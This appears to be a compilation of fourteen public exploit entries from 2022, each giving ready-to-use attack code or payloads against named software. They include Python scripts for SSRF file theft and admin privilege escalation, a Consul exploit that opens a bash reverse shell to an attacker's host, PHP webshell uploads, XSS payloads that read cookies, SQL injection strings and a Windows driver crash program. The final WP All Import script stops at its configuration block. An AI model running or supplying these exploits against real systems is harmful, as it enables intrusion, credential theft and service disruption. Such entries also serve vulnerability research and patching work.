
  1. # Exploit Title: BoxBilling<=4.22.1.5 - Remote Code Execution (RCE) # Date: 2022-09-18 # Exploit Author: zetc0de # Vendor Homepage: https://www.boxbilling.org/ # Software Link: https://github.com/boxbilling/boxbilling/releases/download/4.22.1.5/BoxBilling.zip # Version: <=4.22.1.5 (Latest) # Tested on: Windows 10 # CVE : CVE-2022-3552 # BoxBilling was vulnerable to Unrestricted File Upload. # In order to exploit the vulnerability, an attacker must have a valid authenticated session as admin on the CMS. # With at least 1 order of product an attacker can upload malicious file to hidden API endpoint that contain a webshell and get RCE ################################################################################### ## POC POST /index.php?_url=/api/admin/Filemanager/save_file HTTP/1.1 Host: local.com:8089 Content-Length: 52 Accept: application/json, text/javascript, */*; q=0.01 DNT: 1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=3nrf9i4mv28o5anva77ltq042d Connection: close order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f> POC Video : https://drive.google.com/file/d/1m2glCeJ9QXc8epuY2QfvbWwjLTJ8_Hjx/view?usp=sharing
  2. # Exploit Title: Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF) # Google Dork: intitle:"Label Studio" intext:"Sign Up" intext:"Welcome to Label Studio Community Edition" # Date: 2022-10-03 # Exploit Author: @DeveloperNinja, [email protected] # Vendor Homepage: https://github.com/heartexlabs/label-studio, https://labelstud.io/ # Software Link: https://github.com/heartexlabs/label-studio/releases # Version: <=1.5.0 # CVE : CVE-2022-36551 # Docker Container: heartexlabs/label-studio # Server Side Request Forgery (SSRF) in the Data Import module in Heartex - Label Studio Community Edition # versions 1.5.0 and earlier allows an authenticated user to access arbitrary files on the system. # Furthermore, self-registration is enabled by default in these versions of Label Studio enabling a remote # attacker to create a new account and then exploit the SSRF. # # This exploit has been tested on Label Studio 1.5.0 # # Exploit Usage Examples (replace with your target details): # - python3 exploit.py --url http://localhost:8080/ --username "[email protected]" --password 12345678 --register --file /etc/passwd # - python3 exploit.py --url http://localhost:8080/ --username "[email protected]" --password 12345678 --register --file /proc/self/environ # - python3 exploit.py --url http://localhost:8080/ --username "[email protected]" --password 12345678 --register --file /label-studio/data/label_studio.sqlite3 --out label_studio.sqlite3.sqlite3 import json import argparse import requests import shutil from urllib.parse import urljoin from urllib.parse import urlparse requests.packages.urllib3.disable_warnings() # main function for exploit def main(url, filePath, writePath, username, password, shouldRegister): # check if the URL is reachable try: r = requests.get(url, verify=False) if r.status_code == 200: print("[+] URL is reachable") else: print("[!] 
Error: URL is not reachable, check the URL and try again") exit(1) except requests.exceptions.RequestException as e: print("[!] Error: URL is not reachable, check the URL and try again") exit(1) session = requests.Session() login(session, url, username, password, shouldRegister) print("[+] Logged in") print("[+] Creating project...") # Create a temp project projectDetails = create_project(session, url) print("[+] Project created, ID: {}".format(projectDetails["id"])) #time for the actual exploit, import a "file" to the newly created project (IE: file:///etc/passwd, or file:///proc/self/environ) print("[+] Attempting to fetch: {}".format(filePath)) fetch_file(session, url, projectDetails["id"], filePath, writePath) print("[+] Deleting Project.. {}".format(projectDetails["id"])) delete_project(session, url, projectDetails["id"]) print("[+] Project Deleted") print("[*] Finished executing exploit") # login, logs the user in def login(session, url, username, password, shouldRegister): # hit the main page first to get the CSRF token set r = session.get(url, verify=False) r = session.post( urljoin(url, "/user/login"), data={ "email": username, "password": password, "csrfmiddlewaretoken": session.cookies["csrftoken"], }, verify=False ) if r.status_code == 200 and r.text.find("The email and password you entered") < 0: return elif r.text.find("The email and password you entered") > 0 and shouldRegister: print("[!] Account does not exist, registering...") r = session.post( urljoin(url, "/user/signup/"), data={ "email": username, "password": password, "csrfmiddlewaretoken": session.cookies["csrftoken"], 'allow_newsletters': False, }, ) if r.status_code == 302: # at this point the system automatically logs you in (assuming self-registration is enabled, which it is by default) return else: print("[!] 
Error: Could not login, check the credentials and try again") exit(1) # create_project creates a temporary project for exploiting the SSRF def create_project(session, url): r = session.post( urljoin(url, "/api/projects"), data={ "title": "TPS Report Finder", }, verify=False ) if r.status_code == 200 or r.status_code == 201: return r.json() else: print("[!] Error: Could not create project, check your credentials / permissions") exit(1) def fetch_file(session, url, projectId, filePath, writePath): # if scheme is empty prepend file:// parsedFilePath = urlparse(filePath) if parsedFilePath.scheme == "": filePath = "file://" + filePath headers = { 'Content-Type': 'application/x-www-form-urlencoded' } url = urljoin(url, "/api/projects/{}/import".format(projectId)) r = session.post(url, data={ "url": filePath, # This is the main vulnerability, there is no restriction on the "schema" of the provided URL }, headers=headers, verify=False ) if r.status_code == 201: # file found! -- first grab the file path details fileId = r.json()["file_upload_ids"][0] r = session.get(urljoin(url, "/api/import/file-upload/{}".format(fileId)), headers=headers, verify=False) r = session.get(urljoin(url, "/data/{}".format(r.json()["file"])), headers=headers, verify=False, stream=True) print("[+] File found!") # if user wants to write to disk, make it so if writePath != None: print("[+] Writing to {}".format(writePath)) # write the file to disk with open(writePath, 'wb') as handle: shutil.copyfileobj(r.raw, handle) handle.close() return else: print("==========================================================") print(r.text) print("==========================================================") return else: print("[!] 
Error: Could not fetch file, it's likely the file path doesn't exist: ") print("\t" + r.json()["validation_errors"]["non_field_errors"][0]) return def delete_project(session, url, projectId): url = urljoin(url, "/api/projects/{}".format(projectId)) r = session.delete(url, verify=False) if r.status_code == 200 or r.status_code == 204: return else: print( "[!] Error: Could not delete project, check your credentials / permissions") exit(1) parser = argparse.ArgumentParser() parser.add_argument("--url", required=True, help="Label Studio URL") parser.add_argument("--file", required=True, help="Path to the file you want to fetch") parser.add_argument("--out", required=False, help="Path to write the file. If omitted will be written to STDOUT") parser.add_argument("--username", required=False, help="Username for existing account (email)") parser.add_argument("--password", required=False, help="Password for existing account") parser.add_argument("--register", required=False, action=argparse.BooleanOptionalAction, help="Register user if it doesn't exist", ) args = parser.parse_args() main(args.url, args.file, args.out, args.username, args.password, args.register)
  3. # Exploit Title: Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS) # Date: 2022-08-10 # Exploit Author: Sinem Şahin # Vendor Homepage: https://intelliants.com/ # Version: 4.2.1 # Tested on: Windows & XAMPP ==> Tutorial <== 1- Go to the following URL. => http://(HOST)/panel/fields/add 2- Write the XSS payload into the tooltip value of the field add page. 3- Press the "Save" button. 4- Go to the following URL. => http://(HOST)/panel/members/add XSS Payload ==> "<script>alert("field_tooltip_XSS")</script> Reference: https://github.com/intelliants/subrion/issues/895
  4. #Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF) #Date: 24/10/2022 #Exploit Author: Hosein Vita & Milad Fadavvi #Vendor Homepage: https://github.com/zalando/skipper #Software Link: https://github.com/zalando/skipper #Version: < v0.13.237 #Tested on: Linux #CVE: CVE-2022-38580 Summary: Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of the proxy to access the internal metadata server or other unauthenticated URLs by adding a specific header (X-Skipper-Proxy) to the HTTP request. Proof Of Concept: 1- Add header "X-Skipper-Proxy" to your request 2- Add the aws metadata to the path GET /latest/meta-data/iam/security-credentials HTTP/1.1 Host: yourskipperdomain.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 X-Skipper-Proxy: http://169.254.169.254 Connection: close Reference: https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2
  5. # Exploit Title: ZKTeco ZEM/ZMM 8.88 - Missing Authentication # Exploit Author: RedTeam Pentesting GmbH # CVE: CVE-2022-42953 Advisory: Missing Authentication in ZKTeco ZEM/ZMM Web Interface The ZKTeco time attendance device does not require authentication to use the web interface, exposing the database of employees and their credentials. Details ======= Product: ZKTeco ZEM500-510-560-760, ZEM600-800, ZEM720, ZMM Affected Versions: potentially versions below 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720) and 15.00 (ZMM200-220-210) Fixed Versions: firmware version 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720), firmware version 15.00 (ZMM200-220-210) Vulnerability Type: Missing Authentication Security Risk: medium Vendor URL: https://zkteco.eu/company/history Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-003 Advisory Status: published CVE: CVE-2022-42953 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42953 Introduction ============ "Time attendance and workforce management is an integrated set of processes that an institution uses to optimize the productivity of its employees on the individual, departmental, and entity-wide levels. ZKTeco has been at the forefront of time attendance solutions for the last 30 years, integrating advanced biometric technologies with innovative and versatile terminals." (from company website) More Details ============ The ZKTeco ZEM/ZMM device allows to store a list of users and their credentials which may be used to log into the device to prove the users' attendance. These credentials can either be a PIN, a card for a variety of card readers, or a fingerprint. The user list can be managed through the web interface. 
When opening the web interface, for example on http://192.0.2.1/, the web server of the device sends a Set-Cookie header for a cookie with name and value similar to the following: ----------------------------------------------------------------------- Set-Cookie: SessionID=1624553126; path=/; ----------------------------------------------------------------------- It was determined that the value of the cookie is roughly the number of seconds since January 1, 1970. Since the value has a constant offset, that might allow attackers to guess the cookie value. After setting the cookie, the webserver redirects the browser to "/csl/login". The login form provided at this URL has its form action set to "/csl/check". If the user provides wrong credentials, the web server responds with an error message. If the user provides correct credentials, the server responds with a frameset. In this frameset various options are available, for example a user list. The list contains a link titled "Options" for each user item which references a URL similar to the following http://192.0.2.1/csl/user?did=0&uid=123 Additionally, backups of all settings of the device can be downloaded from the backup page. 
The request to do so looks similar to the following: ----------------------------------------------------------------------- POST /form/DataApp HTTP/1.1 Host: 192.0.2.1 User-Agent: Mozilla/5.0 Cookie: SessionID=1624553126 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 7 Origin: http://192.0.2.1 Referer: http://192.0.2.1/form/Device?act=11 style=1 ----------------------------------------------------------------------- When the value "1" is given for the field named "style", the web server responds with the file "device.dat" (corresponding to the option "Backup System Data" in the web interface), for all other values the server responds with the file "data.dat" (corresponding to the option "Backup User Data" in the web interface). Both files can not only be requested using HTTP-POST, but also using HTTP-GET with the following URLs: http://192.0.2.1/form/DataApp?style=1 http://192.0.2.1/form/DataApp?style=0 Both files are - even though it's not obvious from the filename - compressed tar archives. 
They can be extracted in the following way: ----------------------------------------------------------------------- $ mv data.dat data.tgz $ tar xvzf data.tgz rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/group.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/htimezone.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/lockgroup.dat rwxrwxrwx 500/513 10512 2021-06-23 07:23 mnt/mtdblock/ssruser.dat rwxr-xr-x root/root 819896 2021-06-18 07:23 mnt/mtdblock/tempinfo.dat rwxrwxrwx 500/513 19456 2005-05-05 07:05 mnt/mtdblock/template.dat rw-r--r-- root/root 360448 2021-06-18 07:23 mnt/mtdblock/templatev10.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/timezone.dat rwxrwxrwx 500/513 1372 2005-05-05 07:25 mnt/mtdblock/user.dat rwxr-xr-x root/root 120 1970-01-01 01:08 mnt/mtdblock/data/alarm.dat rwxr-xr-x root/root 0 2021-06-23 09:55 mnt/mtdblock/data/extlog.dat rwxr-xr-x root/root 0 2013-05-04 01:28 mnt/mtdblock/data/extuser.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/group.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/htimezone.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/lockgroup.dat rwxr-xr-x root/root 54800 2021-06-23 09:55 mnt/mtdblock/data/oplog.dat rwxr-xr-x root/root 33200 2021-06-23 07:23 mnt/mtdblock/data/sms.dat rwxr-xr-x root/root 0 2021-06-23 09:55 mnt/mtdblock/data/ssrattlog.dat rwxr-xr-x root/root 660 2018-11-09 17:28 mnt/mtdblock/data/stkey.dat rwxrwxrwx 500/513 0 2013-05-04 01:28 mnt/mtdblock/data/template.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/timezone.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/transaction.dat rwxr-xr-x root/root 952 2021-06-23 07:24 mnt/mtdblock/data/udata.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/user.dat rwxr-xr-x root/root 0 2013-05-04 01:28 mnt/mtdblock/data/wkcd.dat ----------------------------------------------------------------------- In this archive, the file "mnt/mtdblock/templatev10.dat" will 
likely contain fingerprints, and the file "mnt/mtdblock/ssruser.dat" contains the user database. The user database contains 72 byte user records, each containing the privilege level, the PIN, the name of the user, data stored on external authentication tokens like cards, and the group of the user. While the cookie value might be guessable, it is not used for authentication purposes. An attacker with knowledge of the corresponding URLs could access the user detail view or the backup without any authentication. Proof of Concept ================ http://192.0.2.1/form/DataApp?style=1 http://192.0.2.1/form/DataApp?style=0 http://192.0.2.1/csl/user?did=0&uid=123 Workaround ========== Network access to the device should be limited to trustworthy persons. This might be hard to implement if the device is installed in a public space, especially if it is used for access control, too. Fix === Currently, it is not known whether a newer version might fix this issue. Due to the age of the product, the vendor might decide not to create a fix at all. Security Risk ============= Attackers with network access to a ZKTeco ZEM/ZMM time attendance device can get access to employee data, including the credentials used for accessing the time attendance device. If these credentials are used for other purposes than time attendance, such as physical access control, attackers might use them to gain access to protected areas. The actual risk estimate varies wildly with the kind of access control system in place and whether network access to the device is prevented by other means, such as nearby security guards. For this reason, missing authentication to the ZEM/ZMM web interface is estimated to pose a medium risk. This estimate might need to be adjusted to the specific use case of the device. 
Timeline ======== 2021-06-24 Vulnerability identified 2021-07-12 Customer approved disclosure to vendor 2021-07-16 Vendor notified 2021-08-20 Vendor provides fixed firmware 2022-09-29 Customer approved release of advisory 2022-10-10 CVE ID requested 2022-10-15 CVE ID assigned 2022-10-24 Advisory published References ========== https://zkteco.eu/company/history RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Alter Posthof 1 Fax : +49 241 510081-99 52062 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen
  6. # Exploit Title: OPSWAT Metadefender Core - Privilege Escalation # Date: 24 October 2022 # Exploit Author: Ulascan Yildirim # Vendor Homepage: https://www.opswat.com/ # Version: Metadefender Core 4.21.1 # Tested on: Windows / Linux # CVE : CVE-2022-32272 # ============================================================================= # This is a PoC for the Metadefender Core Privilege escalation vulnerability. # To use this PoC, you need a Username & Password. # The OMS_CSRF_TOKEN allows users to execute commands with higher privileges. # ============================================================================= #!/usr/bin/env python3 import requests import json from getpass import getpass url = input("Enter URL in this Format (http://website.com): ") username = input("Username: ") password = getpass("Password: ") url_login = url+'/login' url_user = url+'/user' logindata = {"user":username,"password":password} ## Get the OMS_CSRF_TOKEN & session cookie response_login = requests.post(url_login, json = logindata).json() json_str = json.dumps(response_login) resp = json.loads(json_str) token = resp['oms_csrf_token'] session = resp['session_id'] ## Prepare Header & Cookie headers = { "oms_csrf_token": token, } cookie = { "session_id_ometascan": session } ## Set Payload to get Admin role payload = '{"roles": ["1"]}' response = requests.put(url_user,headers=headers,cookies=cookie,data=payload) print("Response status code: "+str(response.status_code)) if response.status_code == 200: print("Expolit Successful!") else: print("Exploit Unsuccessful")
  7. // Exploit Title: Tunnel Interface Driver - Denial of Service // Date: 07/15/2022 // Exploit Author: ExAllocatePool2 // Vendor Homepage: https://www.microsoft.com/ // Software Link: https://www.microsoft.com/en-us/software-download/windows10 // Version: Windows 10 Pro Version 21H2 (OS Build 19044.1288) // Tested on: Microsoft Windows // GitHub Repository: https://github.com/Exploitables/MSRC-1 #include <Windows.h> #include <stdio.h> #define TARGET_DEVICE "\\\\.\\GLOBALROOT\\Device\\TunnelControl" int main(int argc, char** argv); int main(int argc, char** argv) { HANDLE h_driver = CreateFileA(TARGET_DEVICE, 0x80, 0, 0, OPEN_EXISTING, 0, 0); unsigned long long input_output = 0x4242424242424242; unsigned long bytes_returned = 0x43434343; unsigned char unused = 0; SetConsoleTitleA("https://msrc.microsoft.com/"); printf("[*] Microsoft Security and Response Center Report #1\n[*] Microsoft Tunnel Interface Driver Null Pointer Dereference Denial of Service Vulnerability\n[*] Exploit written by ExAllocatePool2\n[!] Let's exploit!"); if (h_driver == (HANDLE)-1) { printf("\n[-] Failed to obtain a handle to the vulnerable device driver. Error: %d (0x%x)", GetLastError(), GetLastError()); unused = getchar(); return 1; } printf("\n[+] Obtained a handle to the vulnerable device driver. Handle Value: 0x%p", h_driver); printf("\n[!] Triggering a denial of service via arbitrary read in 3..."); for (int i = 2; i > 0; i--) { Sleep(1000); printf("\n[!] %d...", i); } DeviceIoControl(h_driver, 0, &input_output, 8, &input_output, 8, &bytes_returned, 0); unused = getchar(); printf("\n[-] Exploit failed. The machine should have crashed."); return 0; }
  8. # Exploit Title: Moodle LMS 4.0 - Cross-Site Scripting (XSS) # Date: 26/10/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://moodle.org/ # Software Link: https://git.in.moodle.com/moodle # Version: 4.0 # Tested on: XAMPP, Windows 10 # Contact: https://twitter.com/dmaral3noz Description: A Cross Site Scripting (XSS) vulnerability exists in Moodle, a free and open-source Learning Management System (LMS) written in PHP and distributed under the GNU General Public License. Vulnerable Code: line 111 in file "course/search.php" echo $courserenderer->search_courses($searchcriteria); Steps to exploit: 1) Go to http://localhost/course/search.php 2) Insert your payload in the "search" Proof of concept (PoC): The following payload will allow you to run the javascript - "><img src=# onerror=alert(document.cookie)>
  9. ## Title: Social-Share-Buttons v2.2.3 - SQL Injection ## Author: nu11secur1ty ## Date: 09.16.2022 ## Vendor: https://wordpress.org/ ## Software: https://downloads.wordpress.org/plugin/social-share-buttons-by-supsystic.2.2.3.zip ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3 ## Description: The `project_id` parameter from the Social Share Buttons-2.2.3 on the WordPress-6.0.2 system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this system and he can use it for very malicious purposes. WARNING: The attacker can retrieve all-database from this system! NOTE: The users of this system are NOT protected, this SQL vulnerability is CRITICAL! STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: project_id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=social-sharing-share&project_id=378116348' or '3724'='3724' AND 7995=7995 AND 'rQVH'='rQVH&network_id=5&post_id= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=social-sharing-share&project_id=378116348' or '3724'='3724' AND (SELECT 9167 FROM (SELECT(SLEEP(5)))dQDw) AND 'KWbC'='KWbC&network_id=5&post_id= --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3) ## Proof and Exploit: [href](https://streamable.com/m9r76w) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
  10. # Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution (RCE) # Date: 26/10/2022 # Exploit Author: GatoGamer1155, 0bfxgh0st # Vendor Homepage: https://www.consul.io/ # Description: Exploit for gain reverse shell on Remote Command Execution via API # References: https://www.consul.io/api/agent/service.html # Tested on: Ubuntu Server # Software Link: https://github.com/hashicorp/consul import requests, sys if len(sys.argv) < 6: print(f"\n[\033[1;31m-\033[1;37m] Usage: python3 {sys.argv[0]} <rhost> <rport> <lhost> <lport> <acl_token>\n") exit(1) target = f"http://{sys.argv[1]}:{sys.argv[2]}/v1/agent/service/register" headers = {"X-Consul-Token": f"{sys.argv[5]}"} json = {"Address": "127.0.0.1", "check": {"Args": ["/bin/bash", "-c", f"bash -i >& /dev/tcp/{sys.argv[3]}/{sys.argv[4]} 0>&1"], "interval": "10s", "Timeout": "864000s"}, "ID": "gato", "Name": "gato", "Port": 80} try: requests.put(target, headers=headers, json=json) print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n") except: print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection and try again\n")
  11. # Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS) # Date: 9 October 2022 # Exploit Author: Okan Kurtulus # Vendor Homepage: https://reqlogic.com # Version: 11.3 # Tested on: Linux # CVE : 2022-41441 # Proof of Concept: 1- Install ReQlogic v11.3 2- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=3 3- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters. #XSS Payload: </script><script>alert(1)</script> #Affected Parameters POBatch WaitDuration #Final URLs http://localhost:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3 http://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>
  12. # Exploit Title: iBooking v1.0.8 - Arbitrary File Upload # Exploit Author: d1z1n370/oPty # Date: 01/11/2022 # Vendor Homepage: https://codecanyon.net/item/ibooking-laravel-booking-system/30362088 # Tested on: Linux # Version: 1.0.8 # Exploit Description: The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands. # PoC request POST https://localhost/dashboard/upload-new-media HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/108.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://localhost/dashboard/settings X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------115904534120015298741783774062 Content-Length: 449 Connection: close Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c -----------------------------115904534120015298741783774062 Content-Disposition: form-data; name="_token" kVTpp66poSLeJVYgb1sM6F7KIzQV2hbVfQLaUEEW -----------------------------115904534120015298741783774062 Content-Disposition: form-data; name="is_modal" 1 -----------------------------115904534120015298741783774062 Content-Disposition: form-data; name="file"; filename="upload.php56" Content-Type: image/gif GIF89a; <?php system($_GET['a']); phpinfo(); ?> -----------------------------115904534120015298741783774062--
  13. ## Title: Senayan Library Management System v9.5.0 - SQL Injection ## Author: nu11secur1ty ## Date: 11.03.2022 ## Vendor: https://slims.web.id/web/ ## Software: https://github.com/slims/slims9_bulian/releases ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0 ## Description: The `keywords` parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the keywords parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. The injection is confirmed manually from nu11secur1ty. The attacker can retrieve all information from the database of this system, by using this vulnerability. ## STATUS: HIGH Vulnerability [+] Payload: ```MySQL --- Parameter: keywords (GET) Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment) Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7'''))) RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)# --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0) ## Proof and Exploit: [href](https://streamable.com/63og5v) ## Time spent `3:00` System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer 
at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
  14. # Exploit Title: WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated) # Date: 11/05/2022 # Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec) # Vendor Homepage: https://www.wpallimport.com/ # Software Link: https://wordpress.org/plugins/wp-all-import/advanced/ (scroll down to select the version) # Version: <= 3.6.7 (tested: 3.6.7) # Tested on: WordPress 6.1 (os-independent since this exploit does NOT provide the payload) # CVE: CVE-2022-1565 #!/usr/bin/python import requests import re import os # WARNING: This exploit does NOT include the payload. # Also, be sure you already have some valid admin credentials. This exploit needs an administrator account in order to work. # If a file with the same name as the payload is already on the server, the upload will OVERWRITE it # # Please notice that I'm NOT the researcher who found this vulnerability # # # # # VULNERABILITY DESCRIPTION # # # # # # The plugin WP All Import is vulnerable to arbitrary file uploads due to missing file type validation via the wp_all_import_get_gz.php file in versions up to, and including, 3.6.7. # This makes it possible for authenticated attackers, with administrator level permissions and above, to upload arbitrary files on the affected sites server which may make remote code execution possible. # # # # # HOW THE EXPLOIT WORKS # # # # # # 1. Prepare the zip file: # - create a PHP file with your payload (e.g. rerverse shell) # - set the variable "payload_file_name" with the name of this file (e.g. "shell.php") # - create a zip file with the payload # - set the variable "zip_file_to_upload" with the PATH of this file (e.g. "/root/shell.zip") # # 2. Login using an administrator account: # - set the variable "target_url" with the base URL of the target (do NOT end the string with the slash /) # - set the variable "admin_user" with the username of an administrator account # - set the variable "admin_pass" with the password of an administrator account # # 3. 
Get the wpnonce using the get_wpnonce_upload_file() method # - there are actually 2 types of wpnonce: # - the first wpnonce will be retrieved using the method retrieve_wpnonce_edit_settings() inside the PluginSetting class. # This wpnonce allows us to change the plugin settings (check the step 4) # - the second wpnonce will be retrieved using the method retrieve_wpnonce_upload_file() inside the PluginSetting class. # This wpnonce allows us to upload the file # # 4. Check if the plugin secure mode is enabled using the method check_if_secure_mode_is_enabled() inside the PluginSetting class # - if the Secure Mode is enabled, the zip content will be put in a folder with a random name. # The exploit will disable the Secure Mode. # By disabling the Secure Mode, the zip content will be put in the main folder (check the variable payload_url). # The method called to enable and disable the Secure Mode is set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str) # - if the Secure Mode is NOT enabled, the exploit will upload the file but then it will NOT enable the Secure Mode. # # 5. Upload the file using the upload_file(wpnonce_upload_file: str) method # - after the upload, the server should reply with HTTP 200 OK but it doesn't mean the upload was completed successfully. # The response will contain a JSON that looks like this: # {"jsonrpc":"2.0","error":{"code":102,"message":"Please verify that the file you uploading is a valid ZIP file."},"is_valid":false,"id":"id"} # As you can see, it says that there's an error with code 102 but, according to the tests I've done, the upload is completed # # 6. Re-enable the Secure Mode if it was enabled using the switch_back_to_secure_mode() method # # 7. Activate the payload using the activate_payload() method # - you can define a method to activate the payload. # There reason behind this choice is that this exploit does NOT provide any payload. 
# Since you can use a custom payload, you may want to activate it using an HTTP POST request instead of a HTTP GET request, or you may want to pass parameters # # # # # WHY DOES THE EXPLOIT DISABLE THE SECURE MODE? # # # # # # According to the PoC of this vulnerability provided by WPSCAN, we should be able to retrieve the uploaded files by visiting the "MAnaged Imports page" # I don't know why but, after the upload of any file, I couldn't see the uploaded file in that page (maybe the Pro version is required?) # I had to find a workaround and so I did, by exploiting this option. # WPSCAN Page: https://wpscan.com/vulnerability/578093db-a025-4148-8c4b-ec2df31743f7 # # # # # ANY PROBLEM WITH THE EXPLOIT? # # # # # # In order for the exploit to work please consider the following: # 1. check the target_url and the admin credentials # 2. check the path of the zip file and the name of the payload (they can be different) # 3. if you're testing locally, try to set verify_ssl_certificate on False # 4. you can use print_response(http_response) to investigate further # Configure the following variables: target_url = "https://vulnerable.wp/wordpress" # Target base URL admin_user = "admin" # Administrator username admin_pass = "password" # Administrator password zip_file_to_upload = "/shell.zip" # Path to the ZIP file (e.g /root/shell.zip) payload_file_name = "shell.php" # Filename inside the zip file (e.g. shell.php). This file will be your payload (e.g. reverse shell) verify_ssl_certificate = True # If True, the script will exit if the SSL Certificate is NOT valid. You can set it on False while testing locally, if needed. 
